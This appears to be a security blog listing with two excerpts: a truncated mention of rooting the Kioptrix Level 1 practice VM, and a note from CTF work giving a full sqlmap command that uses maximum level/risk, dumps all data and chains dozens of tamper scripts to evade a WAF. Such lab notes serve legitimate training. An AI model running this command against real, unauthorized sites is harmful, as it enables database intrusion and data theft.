Kioptrix Level 1 easy root
I’m taking The Cyber Mentor’s Practical Ethical Hacking Course on Udemy and during the scanning and enumeration chapter, we started scanning Kioptrix Level 1. I’ve played around with Kioptrix before and was already prepared to root the machine in a quick two-step, even though that’s not part of the section. To do this root, you’ll […]
sqlmap full scan plus tamper scripts to evade WAF
Just a small note related to sqlmap culled from working on a CTF style challenge. Not all the tamper scripts in jhaddix’s helpful attack string are still working. Current working command: sqlmap -u http://192.168.1.1 –level=5 –risk=3 -a –text-only –technique=BU –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords –random-agent